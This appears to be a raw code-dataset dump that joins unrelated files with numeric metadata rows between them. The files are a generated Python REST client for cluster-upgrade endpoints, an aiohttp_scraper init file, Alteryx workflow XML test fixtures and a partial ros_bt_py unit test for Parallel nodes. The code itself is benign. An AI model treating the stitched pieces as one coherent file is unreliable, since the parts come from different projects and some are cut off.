:param int cluster_node_id: The node details useful during an upgrade or assessment. (required)
:return: ClusterNodesExtendedExtended
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_node_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_cluster_node" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_node_id' is set
if ('cluster_node_id' not in params) or (params['cluster_node_id'] is None):
raise ValueError("Missing the required parameter `cluster_node_id` when calling `get_cluster_node`")
resource_path = '/platform/3/upgrade/cluster/nodes/{ClusterNodeId}'.replace('{format}', 'json')
path_params = {}
if 'cluster_node_id' in params:
path_params['ClusterNodeId'] = params['cluster_node_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ClusterNodesExtendedExtended',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_cluster_nodes(self, **kwargs):
"""
View information about nodes during an upgrade, rollback, or pre-upgrade assessment.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_cluster_nodes(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: ClusterNodesExtendedExtendedExtended
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_cluster_nodes" % key
)
params[key] = val
del params['kwargs']
resource_path = '/platform/3/upgrade/cluster/nodes'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ClusterNodesExtendedExtendedExtended',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_upgrade_cluster(self, **kwargs):
"""
Cluster wide upgrade status info.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_upgrade_cluster(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: UpgradeCluster
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_upgrade_cluster" % key
)
params[key] = val
del params['kwargs']
resource_path = '/platform/3/upgrade/cluster'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UpgradeCluster',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def update_cluster_upgrade(self, cluster_upgrade, **kwargs):
"""
Add nodes to a running upgrade.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_cluster_upgrade(cluster_upgrade, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param ClusterUpgrade cluster_upgrade: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['cluster_upgrade']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_cluster_upgrade" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'cluster_upgrade' is set
if ('cluster_upgrade' not in params) or (params['cluster_upgrade'] is None):
raise ValueError("Missing the required parameter `cluster_upgrade` when calling `update_cluster_upgrade`")
resource_path = '/platform/3/upgrade/cluster/upgrade'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'cluster_upgrade' in params:
body_params = params['cluster_upgrade']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'))
return response
| 38.688576 | 148 | 0.55303 | 4,768 | 49,444 | 5.49245 | 0.051594 | 0.04399 | 0.025317 | 0.023217 | 0.881931 | 0.857301 | 0.836681 | 0.805598 | 0.781694 | 0.774286 | 0 | 0.000866 | 0.369286 | 49,444 | 1,277 | 149 | 38.718872 | 0.838897 | 0.25985 | 0 | 0.772727 | 0 | 0 | 0.18865 | 0.073142 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025758 | false | 0 | 0.010606 | 0 | 0.062121 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
111adb951bcc5d8b5f615f17e5d70301b87adcb5 | 123 | py | Python | aiohttp_scraper/__init__.py | diseq/aiohttp-scraper | d89f5d99ef045cda91972fa516caa00d589dfd7f | [
"MIT"
] | 14 | 2020-02-16T00:35:38.000Z | 2022-03-20T20:26:33.000Z | aiohttp_scraper/__init__.py | diseq/aiohttp-scraper | d89f5d99ef045cda91972fa516caa00d589dfd7f | [
"MIT"
] | 1 | 2020-09-30T19:08:34.000Z | 2020-10-02T08:37:05.000Z | aiohttp_scraper/__init__.py | diseq/aiohttp-scraper | d89f5d99ef045cda91972fa516caa00d589dfd7f | [
"MIT"
] | 2 | 2020-04-23T02:30:20.000Z | 2021-04-10T21:45:41.000Z | from aiohttp_scraper.proxies import Proxies # noqa: F401
from aiohttp_scraper.session import ScraperSession # noqa: F401
| 41 | 64 | 0.821138 | 16 | 123 | 6.1875 | 0.5625 | 0.222222 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.056075 | 0.130081 | 123 | 2 | 65 | 61.5 | 0.869159 | 0.170732 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
3a2ee744035dd801d0884295b236f9126684fd47 | 10,422 | py | Python | DeployWorkflowToGallery/DeployWorkflowToGallery/CollectPackageTestCases.py | tlarsen7572/AlteryxTools | 4bfaefbf59f7206215f42a6ca5b364f71c35fa1f | [
"BSD-2-Clause"
] | 9 | 2019-05-29T12:53:03.000Z | 2020-07-01T13:26:12.000Z | DeployWorkflowToGallery/DeployWorkflowToGallery/CollectPackageTestCases.py | tlarsen7572/AlteryxTools | 4bfaefbf59f7206215f42a6ca5b364f71c35fa1f | [
"BSD-2-Clause"
] | 2 | 2018-07-20T00:23:46.000Z | 2018-10-16T20:37:34.000Z | DeployWorkflowToGallery/DeployWorkflowToGallery/CollectPackageTestCases.py | tlarsen7572/AlteryxTools | 4bfaefbf59f7206215f42a6ca5b364f71c35fa1f | [
"BSD-2-Clause"
] | 2 | 2019-03-15T13:43:36.000Z | 2020-04-27T00:15:53.000Z | import os
absroot = os.path.abspath("TestCases")
single_absolute_macro = """<?xml version="1.0"?>
<AlteryxDocument yxmdVer="2019.1">
<Nodes>
<Node ToolID="1">
<GuiSettings Plugin="AlteryxBasePluginsGui.TextInput.TextInput">
<Position x="102" y="78" />
</GuiSettings>
<Properties>
<Configuration>
<NumRows value="1" />
<Fields>
<Field name="Field1" />
</Fields>
<Data>
<r>
<c>A</c>
</r>
</Data>
</Configuration>
<Annotation DisplayMode="0">
<Name />
<DefaultAnnotationText />
<Left value="False" />
</Annotation>
</Properties>
<EngineSettings EngineDll="AlteryxBasePluginsEngine.dll" EngineDllEntryPoint="AlteryxTextInput" />
</Node>
<Node ToolID="3">
<GuiSettings Plugin="AlteryxBasePluginsGui.BrowseV2.BrowseV2">
<Position x="294" y="78" />
</GuiSettings>
<Properties>
<Configuration />
<Annotation DisplayMode="0">
<Name />
<DefaultAnnotationText />
<Left value="False" />
</Annotation>
</Properties>
<EngineSettings EngineDll="AlteryxBasePluginsEngine.dll" EngineDllEntryPoint="AlteryxBrowseV2" />
</Node>
<Node ToolID="4">
<GuiSettings>
<Position x="198" y="78" />
</GuiSettings>
<Properties>
<Configuration />
<Annotation DisplayMode="0">
<Name>Macro (2)</Name>
<DefaultAnnotationText />
<Left value="False" />
</Annotation>
</Properties>
<EngineSettings Macro="{0}\Macro.yxmc" />
</Node>
</Nodes>
<Connections>
<Connection>
<Origin ToolID="1" Connection="Output" />
<Destination ToolID="4" Connection="Input2" />
</Connection>
<Connection>
<Origin ToolID="4" Connection="Output3" />
<Destination ToolID="3" Connection="Input" />
</Connection>
</Connections>
<Properties>
<Memory default="True" />
<GlobalRecordLimit value="0" />
<TempFiles default="True" />
<Annotation on="True" includeToolName="False" />
<ConvErrorLimit value="10" />
<ConvErrorLimit_Stop value="False" />
<CancelOnError value="False" />
<DisableBrowse value="False" />
<EnablePerformanceProfiling value="False" />
<DisableAllOutput value="False" />
<ShowAllMacroMessages value="False" />
<ShowConnectionStatusIsOn value="True" />
<ShowConnectionStatusOnlyWhenRunning value="True" />
<ZoomLevel value="0" />
<LayoutType>Horizontal</LayoutType>
<MetaInfo>
<NameIsFileName value="True" />
<Name>Test</Name>
<Description />
<RootToolName />
<ToolVersion />
<ToolInDb value="False" />
<CategoryName />
<SearchTags />
<Author />
<Company />
<Copyright />
<DescriptionLink actual="" displayed="" />
<Example>
<Description />
<File />
</Example>
</MetaInfo>
<Events>
<Enabled value="True" />
</Events>
</Properties>
</AlteryxDocument>""".format(absroot)
single_absolute_macro_container = """<?xml version="1.0"?>
<AlteryxDocument yxmdVer="2019.1">
<Nodes>
<Node ToolID="1">
<GuiSettings Plugin="AlteryxBasePluginsGui.TextInput.TextInput">
<Position x="126" y="138" />
</GuiSettings>
<Properties>
<Configuration>
<NumRows value="1" />
<Fields>
<Field name="Field1" />
</Fields>
<Data>
<r>
<c>A</c>
</r>
</Data>
</Configuration>
<Annotation DisplayMode="0">
<Name />
<DefaultAnnotationText />
<Left value="False" />
</Annotation>
</Properties>
<EngineSettings EngineDll="AlteryxBasePluginsEngine.dll" EngineDllEntryPoint="AlteryxTextInput" />
</Node>
<Node ToolID="4">
<GuiSettings Plugin="AlteryxBasePluginsGui.BrowseV2.BrowseV2">
<Position x="390" y="138" />
</GuiSettings>
<Properties>
<Configuration>
<Layout>
<View1>
<Hints>
<Table />
</Hints>
</View1>
</Layout>
</Configuration>
<Annotation DisplayMode="0">
<Name />
<DefaultAnnotationText />
<Left value="False" />
</Annotation>
</Properties>
<EngineSettings EngineDll="AlteryxBasePluginsEngine.dll" EngineDllEntryPoint="AlteryxBrowseV2" />
</Node>
<Node ToolID="2">
<GuiSettings Plugin="AlteryxGuiToolkit.ToolContainer.ToolContainer">
<Position x="210" y="102" width="145.3507" height="133" />
</GuiSettings>
<Properties>
<Configuration>
<Caption>Container 2</Caption>
<Style TextColor="#314c4a" FillColor="#ecf2f2" BorderColor="#314c4a" Transparency="25" Margin="25" />
<Disabled value="False" />
<Folded value="False" />
</Configuration>
<Annotation DisplayMode="0">
<Name />
<DefaultAnnotationText />
<Left value="False" />
</Annotation>
</Properties>
<ChildNodes>
<Node ToolID="3">
<GuiSettings>
<Position x="235" y="151" />
</GuiSettings>
<Properties>
<Configuration />
<Annotation DisplayMode="0">
<Name />
<DefaultAnnotationText />
<Left value="False" />
</Annotation>
<Dependencies>
<Implicit />
</Dependencies>
</Properties>
<EngineSettings Macro="{0}\Macro.yxmc" />
</Node>
</ChildNodes>
</Node>
</Nodes>
<Connections>
<Connection>
<Origin ToolID="1" Connection="Output" />
<Destination ToolID="3" Connection="Input2" />
</Connection>
<Connection>
<Origin ToolID="3" Connection="Output3" />
<Destination ToolID="4" Connection="Input" />
</Connection>
</Connections>
<Properties>
<Memory default="True" />
<GlobalRecordLimit value="0" />
<TempFiles default="True" />
<Annotation on="True" includeToolName="False" />
<ConvErrorLimit value="10" />
<ConvErrorLimit_Stop value="False" />
<CancelOnError value="False" />
<DisableBrowse value="False" />
<EnablePerformanceProfiling value="False" />
<DisableAllOutput value="False" />
<ShowAllMacroMessages value="False" />
<ShowConnectionStatusIsOn value="True" />
<ShowConnectionStatusOnlyWhenRunning value="True" />
<ZoomLevel value="0" />
<LayoutType>Horizontal</LayoutType>
<MetaInfo>
<NameIsFileName value="True" />
<Name>Test2</Name>
<Description />
<RootToolName />
<ToolVersion />
<ToolInDb value="False" />
<CategoryName />
<SearchTags />
<Author />
<Company />
<Copyright />
<DescriptionLink actual="" displayed="" />
<Example>
<Description />
<File />
</Example>
</MetaInfo>
<Events>
<Enabled value="True" />
</Events>
</Properties>
</AlteryxDocument>""".format(absroot)
single_absolute_macro_invalid = """<?xml version="1.0"?>
<AlteryxDocument yxmdVer="2019.1">
<Nodes>
<Node ToolID="1">
<GuiSettings Plugin="AlteryxBasePluginsGui.TextInput.TextInput">
<Position x="102" y="78" />
</GuiSettings>
<Properties>
<Configuration>
<NumRows value="1" />
<Fields>
<Field name="Field1" />
</Fields>
<Data>
<r>
<c>A</c>
</r>
</Data>
</Configuration>
<Annotation DisplayMode="0">
<Name />
<DefaultAnnotationText />
<Left value="False" />
</Annotation>
</Properties>
<EngineSettings EngineDll="AlteryxBasePluginsEngine.dll" EngineDllEntryPoint="AlteryxTextInput" />
</Node>
<Node ToolID="3">
<GuiSettings Plugin="AlteryxBasePluginsGui.BrowseV2.BrowseV2">
<Position x="294" y="78" />
</GuiSettings>
<Properties>
<Configuration />
<Annotation DisplayMode="0">
<Name />
<DefaultAnnotationText />
<Left value="False" />
</Annotation>
</Properties>
<EngineSettings EngineDll="AlteryxBasePluginsEngine.dll" EngineDllEntryPoint="AlteryxBrowseV2" />
</Node>
<Node ToolID="4">
<GuiSettings>
<Position x="198" y="78" />
</GuiSettings>
<Properties>
<Configuration />
<Annotation DisplayMode="0">
<Name>Macro (2)</Name>
<DefaultAnnotationText />
<Left value="False" />
</Annotation>
</Properties>
<EngineSettings Macro="{0}\InvalidMacro.yxmc" />
</Node>
</Nodes>
<Connections>
<Connection>
<Origin ToolID="1" Connection="Output" />
<Destination ToolID="4" Connection="Input2" />
</Connection>
<Connection>
<Origin ToolID="4" Connection="Output3" />
<Destination ToolID="3" Connection="Input" />
</Connection>
</Connections>
<Properties>
<Memory default="True" />
<GlobalRecordLimit value="0" />
<TempFiles default="True" />
<Annotation on="True" includeToolName="False" />
<ConvErrorLimit value="10" />
<ConvErrorLimit_Stop value="False" />
<CancelOnError value="False" />
<DisableBrowse value="False" />
<EnablePerformanceProfiling value="False" />
<DisableAllOutput value="False" />
<ShowAllMacroMessages value="False" />
<ShowConnectionStatusIsOn value="True" />
<ShowConnectionStatusOnlyWhenRunning value="True" />
<ZoomLevel value="0" />
<LayoutType>Horizontal</LayoutType>
<MetaInfo>
<NameIsFileName value="True" />
<Name>Test</Name>
<Description />
<RootToolName />
<ToolVersion />
<ToolInDb value="False" />
<CategoryName />
<SearchTags />
<Author />
<Company />
<Copyright />
<DescriptionLink actual="" displayed="" />
<Example>
<Description />
<File />
</Example>
</MetaInfo>
<Events>
<Enabled value="True" />
</Events>
</Properties>
</AlteryxDocument>""".format(absroot)
| 29.440678 | 111 | 0.56208 | 781 | 10,422 | 7.486556 | 0.183099 | 0.056439 | 0.058149 | 0.05986 | 0.910552 | 0.903198 | 0.894989 | 0.876005 | 0.876005 | 0.876005 | 0 | 0.023218 | 0.28507 | 10,422 | 353 | 112 | 29.524079 | 0.761509 | 0 | 1 | 0.908046 | 0 | 0.005747 | 0.980426 | 0.15688 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.002874 | 0 | 0.002874 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
3a5197b7f38d7e43121f076ad72623e9b1d06821 | 22,595 | py | Python | ros_bt_py/test/unittest/test_parallel.py | fzi-forschungszentrum-informatik/ros_bt_py | ed65e2b2f0a03411101f455c0ab38401ba50bada | [
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | 4 | 2022-03-11T14:30:43.000Z | 2022-03-31T07:21:35.000Z | ros_bt_py/test/unittest/test_parallel.py | fzi-forschungszentrum-informatik/ros_bt_py | ed65e2b2f0a03411101f455c0ab38401ba50bada | [
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | ros_bt_py/test/unittest/test_parallel.py | fzi-forschungszentrum-informatik/ros_bt_py | ed65e2b2f0a03411101f455c0ab38401ba50bada | [
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | # -------- BEGIN LICENSE BLOCK --------
# Copyright 2022 FZI Forschungszentrum Informatik
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of the {copyright_holder} nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# -------- END LICENSE BLOCK --------
from copy import deepcopy
import unittest
from ros_bt_py_msgs.msg import Node, UtilityBounds
from ros_bt_py.exceptions import BehaviorTreeException
from ros_bt_py.nodes.mock_nodes import MockLeaf, MockUtilityLeaf
from ros_bt_py.nodes.parallel import Parallel, ParallelFailureTolerance
def make_parallel(needed_successes):
return Parallel(options={'needed_successes': needed_successes})
def make_parallel_failure_tolerance(needed_successes, tolerate_failures):
return ParallelFailureTolerance(options={
'needed_successes': needed_successes,
'tolerate_failures': tolerate_failures
})
class TestParallel(unittest.TestCase):
def setUp(self):
self.succeeder = MockLeaf(name='succeeder',
options={'output_type': int,
'state_values': [Node.SUCCEEDED],
'output_values': [1]})
self.failer = MockLeaf(name='failer',
options={'output_type': int,
'state_values': [Node.FAILED],
'output_values': [1]})
self.run_then_succeed = MockLeaf(name='run_then_succeed',
options={'output_type': int,
'state_values': [Node.RUNNING, Node.SUCCEEDED],
'output_values': [1, 1]})
self.run_then_fail = MockLeaf(name='run_then_fail',
options={'output_type': int,
'state_values': [Node.RUNNING, Node.FAILED],
'output_values': [1, 1]})
self.runner = MockLeaf(name='runner',
options={'output_type': int,
'state_values': [Node.RUNNING],
'output_values': [1]})
self.cheap_fail = MockUtilityLeaf(
name='cheap_fail',
options={
'can_execute': True,
'utility_lower_bound_success': 5.0,
'utility_upper_bound_success': 10.0,
'utility_lower_bound_failure': 1.0,
'utility_upper_bound_failure': 2.0})
self.cheap_success = MockUtilityLeaf(
name='cheap_success',
options={
'can_execute': True,
'utility_lower_bound_success': 1.0,
'utility_upper_bound_success': 2.0,
'utility_lower_bound_failure': 5.0,
'utility_upper_bound_failure': 10.0})
self.can_not_execute = MockUtilityLeaf(
name='can_not_execute',
options={
'can_execute': False,
'utility_lower_bound_success': 0.0,
'utility_upper_bound_success': 0.0,
'utility_lower_bound_failure': 0.0,
'utility_upper_bound_failure': 0.0})
def testSuccessesException(self):
par = make_parallel(3)\
.add_child(self.succeeder)\
.add_child(self.run_then_succeed)
self.assertRaises(BehaviorTreeException, par.setup)
self.assertRaises(BehaviorTreeException, par.calculate_utility)
def testWithRunningChildren(self):
par = make_parallel(2)\
.add_child(self.failer)\
.add_child(self.runner)
par.setup()
self.assertEqual(par.tick(), Node.FAILED)
self.assertEqual(par.untick(), Node.IDLE)
self.assertEqual(par.reset(), Node.IDLE)
self.assertEqual(par.shutdown(), Node.SHUTDOWN)
def testBarrierSuccess(self):
par = make_parallel(2)\
.add_child(self.succeeder)\
.add_child(self.run_then_succeed)
par.setup()
# run_then_succeed returns RUNNING on the first tick, so we
# need a second tick
self.assertEqual(par.tick(), Node.RUNNING)
self.assertEqual(par.tick(), Node.SUCCEEDED)
# succeeder should not be ticked again as long as
# run_then_succeed has not produced a result
self.assertEqual(self.succeeder.tick_count, 1)
self.assertEqual(self.run_then_succeed.tick_count, 2)
self.assertEqual(par.tick(), Node.RUNNING)
# The Parallel should reset its children after producing a
# result
self.assertEqual(self.succeeder.reset_count, 1)
self.assertEqual(self.run_then_succeed.reset_count, 1)
self.assertEqual(par.tick(), Node.SUCCEEDED)
self.assertEqual(self.succeeder.tick_count, 2)
self.assertEqual(self.run_then_succeed.tick_count, 4)
par.shutdown()
def testBarrierFailure(self):
par = make_parallel(2)\
.add_child(self.succeeder)\
.add_child(self.run_then_fail)
par.setup()
# run_then_fail returns RUNNING on the first tick, so we
# need a second tick
self.assertEqual(par.tick(), Node.RUNNING)
self.assertEqual(par.tick(), Node.FAILED)
# succeeder should not be ticked again as long as
# run_then_fail has not produced a result
self.assertEqual(self.succeeder.tick_count, 1)
self.assertEqual(self.run_then_fail.tick_count, 2)
self.assertEqual(par.tick(), Node.RUNNING)
# The Parallel should reset its children after producing a
# result
self.assertEqual(self.succeeder.reset_count, 1)
self.assertEqual(self.run_then_fail.reset_count, 1)
self.assertEqual(par.tick(), Node.FAILED)
self.assertEqual(self.succeeder.tick_count, 2)
self.assertEqual(self.run_then_fail.tick_count, 4)
par.shutdown()
def testHeurekaSuccess(self):
"""The "Heureka" configuration returns SUCCEEDED with just a single succeeding child"""
par = make_parallel(1)\
.add_child(self.succeeder)\
.add_child(self.run_then_fail)
par.setup()
# Because succeeder immediately succeeds, the Parallel
# succeeds and resets run_then_fail before the second tick
self.assertEqual(par.tick(), Node.SUCCEEDED)
self.assertEqual(self.succeeder.tick_count, 1)
self.assertEqual(self.run_then_fail.tick_count, 1)
self.assertEqual(par.tick(), Node.SUCCEEDED)
self.assertEqual(self.succeeder.reset_count, 1)
self.assertEqual(self.run_then_fail.reset_count, 1)
self.assertEqual(self.succeeder.tick_count, 2)
self.assertEqual(self.run_then_fail.tick_count, 2)
par.shutdown()
def testHeurekaFailure(self):
"""The "Heureka" configuration returns FAILED only when all children fail"""
par = make_parallel(1)\
.add_child(self.failer)\
.add_child(self.run_then_fail)
par.setup()
# Because succeeder immediately succeeds, the Parallel
# succeeds and resets run_then_fail before the second tick
self.assertEqual(par.tick(), Node.RUNNING)
self.assertEqual(self.failer.tick_count, 1)
self.assertEqual(self.run_then_fail.tick_count, 1)
self.assertEqual(par.tick(), Node.FAILED)
# Again, failer should not be ticked again before run_then_fail produces a result
self.assertEqual(self.failer.tick_count, 1)
self.assertEqual(self.run_then_fail.tick_count, 2)
self.assertEqual(par.tick(), Node.RUNNING)
self.assertEqual(self.failer.reset_count, 1)
self.assertEqual(self.run_then_fail.reset_count, 1)
self.assertEqual(par.tick(), Node.FAILED)
self.assertEqual(self.failer.tick_count, 2)
self.assertEqual(self.run_then_fail.tick_count, 4)
par.shutdown()
def testParallelUtilityCalculation(self):
par = make_parallel(1)\
.add_child(self.cheap_success)\
.add_child(self.cheap_fail)
expected_bounds = UtilityBounds(
can_execute=True,
has_lower_bound_success=True,
has_upper_bound_success=True,
has_lower_bound_failure=True,
has_upper_bound_failure=True)
cheap_success_bounds = self.cheap_success.calculate_utility()
cheap_fail_bounds = self.cheap_fail.calculate_utility()
expected_bounds.lower_bound_success = cheap_success_bounds.lower_bound_success
expected_bounds.upper_bound_success = cheap_fail_bounds.upper_bound_success
expected_bounds.lower_bound_failure = (cheap_success_bounds.lower_bound_failure
+ cheap_fail_bounds.lower_bound_failure)
expected_bounds.upper_bound_failure = (cheap_success_bounds.upper_bound_failure
+ cheap_fail_bounds.upper_bound_failure)
self.assertEqual(par.calculate_utility(), expected_bounds)
par = make_parallel(2)\
.add_child(self.cheap_success)\
.add_child(self.cheap_fail)
# Now that we need two successes, success and failure are
# basically swapped
expected_bounds.lower_bound_success = (cheap_success_bounds.lower_bound_success
+ cheap_fail_bounds.lower_bound_success)
expected_bounds.upper_bound_success = (cheap_success_bounds.upper_bound_success
+ cheap_fail_bounds.upper_bound_success)
expected_bounds.lower_bound_failure = cheap_fail_bounds.lower_bound_failure
expected_bounds.upper_bound_failure = cheap_success_bounds.upper_bound_failure
self.assertEqual(par.calculate_utility(), expected_bounds)
def testParallelUtilityCalculationCanNotExecute(self):
par = make_parallel(1)\
.add_child(self.can_not_execute)
expected_bounds = UtilityBounds(
can_execute=False,
has_lower_bound_success=False,
has_upper_bound_success=False,
has_lower_bound_failure=False,
has_upper_bound_failure=False)
self.assertEqual(par.calculate_utility(), expected_bounds)
class TestParallelFailureTolerance(unittest.TestCase):
def setUp(self):
self.succeeder = MockLeaf(name='succeeder',
options={'output_type': int,
'state_values': [Node.SUCCEEDED],
'output_values': [1]})
self.failer = MockLeaf(name='failer',
options={'output_type': int,
'state_values': [Node.FAILED],
'output_values': [1]})
self.run_then_succeed = MockLeaf(name='run_then_succeed',
options={'output_type': int,
'state_values': [Node.RUNNING, Node.SUCCEEDED],
'output_values': [1, 1]})
self.run_then_fail = MockLeaf(name='run_then_fail',
options={'output_type': int,
'state_values': [Node.RUNNING, Node.FAILED],
'output_values': [1, 1]})
self.runner = MockLeaf(name='runner',
options={'output_type': int,
'state_values': [Node.RUNNING],
'output_values': [1]})
self.cheap_fail = MockUtilityLeaf(
name='cheap_fail',
options={
'can_execute': True,
'utility_lower_bound_success': 5.0,
'utility_upper_bound_success': 10.0,
'utility_lower_bound_failure': 1.0,
'utility_upper_bound_failure': 2.0})
self.cheap_success = MockUtilityLeaf(
name='cheap_success',
options={
'can_execute': True,
'utility_lower_bound_success': 1.0,
'utility_upper_bound_success': 2.0,
'utility_lower_bound_failure': 5.0,
'utility_upper_bound_failure': 10.0})
self.can_not_execute = MockUtilityLeaf(
name='can_not_execute',
options={
'can_execute': False,
'utility_lower_bound_success': 0.0,
'utility_upper_bound_success': 0.0,
'utility_lower_bound_failure': 0.0,
'utility_upper_bound_failure': 0.0})
def testSuccessesException(self):
par = make_parallel_failure_tolerance(3, 3)\
.add_child(self.succeeder)\
.add_child(self.run_then_succeed)
self.assertRaises(BehaviorTreeException, par.setup)
self.assertRaises(BehaviorTreeException, par.calculate_utility)
def testOverlyOptimistic(self):
"""Fail if two failures are received"""
par = make_parallel_failure_tolerance(2, 2)\
.add_child(self.failer)\
.add_child(self.runner)
par.setup()
# the node tolerates 2 failures,
# so it continues ticking the running child
# even if it can get 2 successes anymore
self.assertEqual(par.tick(), Node.RUNNING)
self.assertEqual(par.tick(), Node.RUNNING)
self.assertEqual(self.failer.tick_count, 1)
self.assertEqual(self.runner.tick_count, 2)
self.assertEqual(par.untick(), Node.IDLE)
self.assertEqual(par.reset(), Node.IDLE)
self.assertEqual(par.shutdown(), Node.SHUTDOWN)
def testOverlyPessimistic(self):
"""Fail after first failure is received"""
